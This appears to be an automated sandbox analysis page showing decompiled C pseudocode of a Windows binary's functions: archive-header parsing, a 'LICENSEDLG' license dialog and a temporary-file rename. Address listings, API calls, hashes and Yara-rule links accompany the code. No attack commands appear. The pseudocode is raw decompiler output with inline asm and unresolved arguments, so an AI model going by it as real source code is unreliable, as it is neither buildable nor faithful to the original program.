				E00C4D940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00C3C39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00C3C39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00C3C39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00C3C39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00C3C39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00C3C39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00C3C39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00C3C251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00C33E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00C33DEC(_t257, _t240 + 0x28, _t167);
												}
												E00C3C300(_t318, _t240 + 0x10a1, 0x10);
												E00C3C300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00C3C300(_t318, _t240 + 0x10c2, 8);
													E00C3C300(_t318, _t344 + 0x30, 4);
													E00C3F524(_t344 + 0x58);
													E00C3F56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00C3F435(_t344 + 0x5c);
													_t161 = E00C4F3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00C4F3CA(_t325, 0xc62398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00C33E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00C33DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00C3C39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00C3C300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00C3C39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00C40A64(_t240 + 0x1040, _t315, E00C3C2E0(_t278, __eflags), _t315);
													} else {
														E00C40A25(_t240 + 0x1040, _t315, E00C3C29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00C40A64(_t240 + 0x1048, _t315, E00C3C2E0(_t275, __eflags), _t315);
													} else {
														E00C40A25(_t240 + 0x1048, _t315, E00C3C29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00C40A64(_t240 + 0x1050, _t315, E00C3C2E0(_t272, __eflags), _t315);
													} else {
														E00C40A25(_t240 + 0x1050, _t315, E00C3C29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00C3C29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00C406D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00C3C29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00C406D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00C3C29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00C406D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E00C3C39E(_t315);
												__eflags = E00C3C39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00C33E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00C3FA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00C3C39E(_t315);
											 *(_t240 + 0x2104) = E00C3C39E(_t315) & 0x00000001;
											_t331 = E00C3C39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00C3C300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00C3B9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00C41094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00C3C39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00C3C39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00C3C300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00C3C39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00C3C300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00C3C39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00C3C39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00C31EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































                                            0x00c32011
                                            0x00c32017
                                            0x00c3201e
                                            0x00c32022
                                            0x00c32027
                                            0x00c32031
                                            0x00c32688
                                            0x00c3268f
                                            0x00c3268f
                                            0x00c32037
                                            0x00c32039
                                            0x00c3203f
                                            0x00c32046
                                            0x00c3204f
                                            0x00c32051
                                            0x00c32056
                                            0x00c32058
                                            0x00c3205a
                                            0x00000000
                                            0x00000000
                                            0x00c3206d
                                            0x00c32070
                                            0x00c32072
                                            0x00000000
                                            0x00000000
                                            0x00c32078
                                            0x00c3207a
                                            0x00000000
                                            0x00c3208a
                                            0x00c3208a
                                            0x00c3208f
                                            0x00c32093
                                            0x00c32098
                                            0x00c3209b
                                            0x00c3209d
                                            0x00c3209f
                                            0x00c320a1
                                            0x00c320a5
                                            0x00c320a9
                                            0x00000000
                                            0x00c320b9
                                            0x00c320bd
                                            0x00c320ce
                                            0x00c320d2
                                            0x00c320d7
                                            0x00c320dd
                                            0x00c320e1
                                            0x00c320ea
                                            0x00c32102
                                            0x00c32104
                                            0x00c32107
                                            0x00c32107
                                            0x00c3210a
                                            0x00c3210a
                                            0x00c32110
                                            0x00c32114
                                            0x00c3211d
                                            0x00c32135
                                            0x00c32137
                                            0x00c3213a
                                            0x00c3213a
                                            0x00c3211d
                                            0x00c3213d
                                            0x00c32141
                                            0x00c32141
                                            0x00c32149
                                            0x00c32155
                                            0x00c32157
                                            0x00000000
                                            0x00c32168
                                            0x00c32168
                                            0x00c3216b
                                            0x00c3251a
                                            0x00c3251f
                                            0x00c32521
                                            0x00c32551
                                            0x00c3255f
                                            0x00c32567
                                            0x00c32572
                                            0x00c32575
                                            0x00c3257b
                                            0x00c3257e
                                            0x00c3258d
                                            0x00c32592
                                            0x00c32596
                                            0x00c3259a
                                            0x00c325a2
                                            0x00c325a2
                                            0x00c325b2
                                            0x00c325c2
                                            0x00c325c7
                                            0x00c325ce
                                            0x00c325d6
                                            0x00c325df
                                            0x00c325ed
                                            0x00c325f7
                                            0x00c32604
                                            0x00c3260d
                                            0x00c32613
                                            0x00c32624
                                            0x00c32629
                                            0x00c3262e
                                            0x00c32632
                                            0x00c32636
                                            0x00c3263c
                                            0x00c32646
                                            0x00c3264b
                                            0x00c3264e
                                            0x00c32650
                                            0x00c32652
                                            0x00c32652
                                            0x00c32650
                                            0x00c3263c
                                            0x00c32658
                                            0x00c3265f
                                            0x00c32669
                                            0x00c32523
                                            0x00c32530
                                            0x00c32535
                                            0x00c32539
                                            0x00c3253d
                                            0x00c32545
                                            0x00c32545
                                            0x00000000
                                            0x00c32521
                                            0x00c32171
                                            0x00c32174
                                            0x00c324f3
                                            0x00c324f8
                                            0x00c324fa
                                            0x00000000
                                            0x00000000
                                            0x00c32500
                                            0x00c32508
                                            0x00c32512
                                            0x00c321c9
                                            0x00c321cb
                                            0x00000000
                                            0x00c321cb
                                            0x00c3217a
                                            0x00c3217d
                                            0x00c32374
                                            0x00c32376
                                            0x00000000
                                            0x00000000
                                            0x00c3237c
                                            0x00c32387
                                            0x00c32389
                                            0x00c3238e
                                            0x00c32392
                                            0x00c32394
                                            0x00c3239a
                                            0x00c3239e
                                            0x00c3239e
                                            0x00c323a1
                                            0x00c323a5
                                            0x00c323a7
                                            0x00c323a9
                                            0x00c323ab
                                            0x00c323cf
                                            0x00c323ad
                                            0x00c323bb
                                            0x00c323bb
                                            0x00c323d4
                                            0x00c323d8
                                            0x00c323d8
                                            0x00c323dc
                                            0x00c323dc
                                            0x00c323df
                                            0x00c323e3
                                            0x00c323e5
                                            0x00c323e7
                                            0x00c323e9
                                            0x00c3240d
                                            0x00c323eb
                                            0x00c323f9
                                            0x00c323f9
                                            0x00c323e9
                                            0x00c32412
                                            0x00c32418
                                            0x00c32418
                                            0x00c3241b
                                            0x00c3241f
                                            0x00c32421
                                            0x00c32426
                                            0x00c32428
                                            0x00c3244c
                                            0x00c3242a
                                            0x00c32438
                                            0x00c32438
                                            0x00c32451
                                            0x00c32451
                                            0x00c32455
                                            0x00c3245a
                                            0x00c32460
                                            0x00c32462
                                            0x00c32468
                                            0x00c3246d
                                            0x00c32496
                                            0x00c3249b
                                            0x00c3246f
                                            0x00c32471
                                            0x00c32476
                                            0x00c3247b
                                            0x00c32480
                                            0x00c32482
                                            0x00c32484
                                            0x00c3248f
                                            0x00c3248f
                                            0x00c32484
                                            0x00c324a0
                                            0x00c324a5
                                            0x00c324ae
                                            0x00c324b0
                                            0x00c324b2
                                            0x00c324bd
                                            0x00c324bd
                                            0x00c324b2
                                            0x00c324c2
                                            0x00c324c7
                                            0x00c324d4
                                            0x00c324d6
                                            0x00c324d8
                                            0x00c324e7
                                            0x00c324e7
                                            0x00c324d8
                                            0x00c324c7
                                            0x00c32462
                                            0x00000000
                                            0x00c3245a
                                            0x00c3237e
                                            0x00c32381
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c32381
                                            0x00c32183
                                            0x00c32186
                                            0x00c32317
                                            0x00c32319
                                            0x00000000
                                            0x00000000
                                            0x00c3231f
                                            0x00c3232a
                                            0x00c3232c
                                            0x00c32338
                                            0x00c3233a
                                            0x00c3234a
                                            0x00c32354
                                            0x00c32359
                                            0x00c3236a
                                            0x00c3236a
                                            0x00000000
                                            0x00c3233a
                                            0x00c32321
                                            0x00c32324
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c32324
                                            0x00c3218c
                                            0x00c3218f
                                            0x00c322a2
                                            0x00c322b1
                                            0x00c322bc
                                            0x00c322be
                                            0x00c322c6
                                            0x00c322cc
                                            0x00c322d9
                                            0x00c322de
                                            0x00c322de
                                            0x00c322f4
                                            0x00c322f9
                                            0x00c32304
                                            0x00c3230c
                                            0x00c3230d
                                            0x00000000
                                            0x00c3230d
                                            0x00c32195
                                            0x00c32198
                                            0x00c321d7
                                            0x00c321de
                                            0x00c321e5
                                            0x00c321ee
                                            0x00c321fc
                                            0x00c32202
                                            0x00c32209
                                            0x00c3220d
                                            0x00c3220f
                                            0x00c32218
                                            0x00c3221f
                                            0x00c32221
                                            0x00c32223
                                            0x00c32223
                                            0x00c32229
                                            0x00c3222e
                                            0x00c32232
                                            0x00c32232
                                            0x00c32236
                                            0x00c32238
                                            0x00c32241
                                            0x00c32248
                                            0x00c3224a
                                            0x00c3224c
                                            0x00c3224c
                                            0x00c3224f
                                            0x00c32258
                                            0x00c3225d
                                            0x00c3225d
                                            0x00c32261
                                            0x00c32268
                                            0x00c32271
                                            0x00c32271
                                            0x00c32277
                                            0x00c3227e
                                            0x00c32287
                                            0x00c32287
                                            0x00c3228d
                                            0x00000000
                                            0x00c3228d
                                            0x00c3219d
                                            0x00000000
                                            0x00000000
                                            0x00c321a7
                                            0x00c321b5
                                            0x00c321b5
                                            0x00c321b8
                                            0x00c321c1
                                            0x00c321c6
                                            0x00c321c7
                                            0x00000000
                                            0x00c321c7
                                            0x00c32670
                                            0x00c32670
                                            0x00c32670
                                            0x00c32674
                                            0x00c3267a
                                            0x00c3267f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3267f
                                            0x00c32149
                                            0x00c320a9
                                            0x00c3207a
                                            0x00c32687

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: ;%u$x%u$xc%u
                                            • API String ID: 0-2277559157
                                            • Opcode ID: 2024f6ccd5e5e96d80af15a5848bc8e6a8368caa1e0674d98c09b984cae7dadf
                                            • Instruction ID: ff0e682860382a411bed9dfd55cd6cfd453d1446ffefe0bd4dbed12a5701a72c
                                            • Opcode Fuzzy Hash: 2024f6ccd5e5e96d80af15a5848bc8e6a8368caa1e0674d98c09b984cae7dadf
                                            • Instruction Fuzzy Hash: 69F157716243405BDF24EF2888D6BFE77A9AF90300F08447DFD859B297CA64D948E762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4A3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00C4A3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E00C312D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E00C4C343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0xc7b704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0xc85d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xc8de1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0xc6df40(0xf));
					 *0xc6df3c(_t35);
					_t31 =  *0xc775ec; // 0x0
					E00C48FE6(_t31, __eflags,  *0xc70064, _t38,  *0xc8de18, 0, 0);
					L00C52B4E( *0xc8de1c);
					L00C52B4E( *0xc8de18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}













                                            0x00c4a3e2
                                            0x00c4a3e8
                                            0x00c4a3ef
                                            0x00c4a408
                                            0x00c4a4ee
                                            0x00c4a4f0
                                            0x00000000
                                            0x00c4a4f0
                                            0x00c4a40e
                                            0x00c4a414
                                            0x00c4a441
                                            0x00c4a446
                                            0x00c4a451
                                            0x00c4a453
                                            0x00c4a45e
                                            0x00c4a45e
                                            0x00c4a460
                                            0x00c4a465
                                            0x00c4a467
                                            0x00c4a473
                                            0x00c4a473
                                            0x00c4a479
                                            0x00c4a47e
                                            0x00c4a480
                                            0x00c4a484
                                            0x00c4a484
                                            0x00c4a499
                                            0x00c4a4a1
                                            0x00c4a4b3
                                            0x00c4a4b6
                                            0x00c4a4bc
                                            0x00c4a4d1
                                            0x00c4a4dc
                                            0x00c4a4e7
                                            0x00000000
                                            0x00c4a4ed
                                            0x00c4a419
                                            0x00c4a428
                                            0x00000000
                                            0x00c4a428
                                            0x00c4a41e
                                            0x00c4a421
                                            0x00c4a43c
                                            0x00c4a430
                                            0x00c4a431
                                            0x00000000
                                            0x00c4a431
                                            0x00c4a426
                                            0x00c4a42f
                                            0x00000000
                                            0x00c4a42f
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            • EndDialog.USER32(?,00000001), ref: 00C4A431
                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C4A45E
                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C4A473
                                            • SetWindowTextW.USER32(?,?), ref: 00C4A484
                                            • GetDlgItem.USER32(?,00000065), ref: 00C4A48D
                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C4A4A1
                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C4A4B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                            • String ID: LICENSEDLG
                                            • API String ID: 3214253823-2177901306
                                            • Opcode ID: 3afd9042b686a39942853c3971083f18f8b1364e21bd2085aad9ef25cb3c3ca8
                                            • Instruction ID: f7e253c96ab968478ad527981449b8d4cdcb686b872b64947a13ef930379ca43
                                            • Opcode Fuzzy Hash: 3afd9042b686a39942853c3971083f18f8b1364e21bd2085aad9ef25cb3c3ca8
                                            • Instruction Fuzzy Hash: 9C21E5327842047BE6215B66EC89F3F3B6CFB46B85F015014F602A50E0CBD29D019776
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00C39268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E00C4D870(E00C61336, _t85);
				E00C4D940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E00C3B943(_t92, _t85 - 0x4030);
							_t78 = E00C3B943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00C41410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00C41410(E00C3B943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00C3FAB1(_t85 - 0x100c, _t83, 0x800);
											E00C33E41(E00C3B943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00C39E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00C3FAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E00C3B9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E00C3943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00C39E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E00C39528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E00C394DA(_t85 - 0x2030);
												E00C39621(_t85 - 0x2030);
											}
											E00C3946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}
















                                            0x00c3926d
                                            0x00c39277
                                            0x00c3927e
                                            0x00c39281
                                            0x00c39290
                                            0x00c39298
                                            0x00c39427
                                            0x00c39427
                                            0x00c39427
                                            0x00c392a6
                                            0x00c392af
                                            0x00c392b7
                                            0x00000000
                                            0x00c392bd
                                            0x00c392bd
                                            0x00c392bf
                                            0x00000000
                                            0x00c392c5
                                            0x00c392d1
                                            0x00c392e0
                                            0x00c392e2
                                            0x00c392e7
                                            0x00000000
                                            0x00c392ed
                                            0x00c392f1
                                            0x00c392f6
                                            0x00c392f8
                                            0x00000000
                                            0x00c392fe
                                            0x00c39306
                                            0x00c3930d
                                            0x00000000
                                            0x00c39313
                                            0x00c39313
                                            0x00c3931a
                                            0x00c3931c
                                            0x00c3931c
                                            0x00c3931f
                                            0x00000000
                                            0x00000000
                                            0x00c3932e
                                            0x00c3934b
                                            0x00c39350
                                            0x00c39361
                                            0x00c3936e
                                            0x00c39363
                                            0x00c39363
                                            0x00c39365
                                            0x00c39365
                                            0x00c39375
                                            0x00c3937e
                                            0x00000000
                                            0x00c39380
                                            0x00c39380
                                            0x00c39383
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39383
                                            0x00000000
                                            0x00c3937e
                                            0x00c39397
                                            0x00c3939c
                                            0x00c393a7
                                            0x00c393c4
                                            0x00000000
                                            0x00c393c6
                                            0x00c393cc
                                            0x00c393d2
                                            0x00c393dc
                                            0x00c393de
                                            0x00c393e0
